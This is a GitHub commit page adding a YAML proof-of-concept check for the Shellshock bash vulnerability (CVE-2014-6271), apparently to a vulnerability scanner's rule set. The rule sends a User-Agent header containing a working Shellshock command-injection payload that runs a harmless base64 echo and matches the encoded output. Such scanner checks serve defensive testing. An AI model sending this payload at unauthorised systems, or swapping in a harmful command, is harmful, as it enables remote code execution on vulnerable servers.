Skip to content

Commit

Permalink
add poc of bash-cve-2014-6271 (chaitin#399)
Browse files Browse the repository at this point in the history 
* add poc of bash-cve-2014-6271

* modify echo words

* fix for yamllint

* modify payload with use of base64

* remove status code check

* add links
  • Loading branch information
@madneal @phith0n
madneal authored and phith0n committed Sep 5, 2019
1 parent ae5f945 commit a019e1d
Showing 1 changed file with 11 additions and 0 deletions.
11 changes: 11 additions & 0 deletions pocs/bash-cve-2014-6271.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
name: poc-yaml-bash-cve-2014-6271
rules:
- method: GET
headers:
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'echo helloworld2019 | base64'"
follow_redirects: false
expression: body.bcontains(b'aGVsbG93b3JsZDIwMTkK')
detail:
author: neal1991(https://github.com/neal1991)
links:
- https://github.com/opsxcq/exploit-CVE-2014-6271

0 comments on commit a019e1d

Please sign in to comment.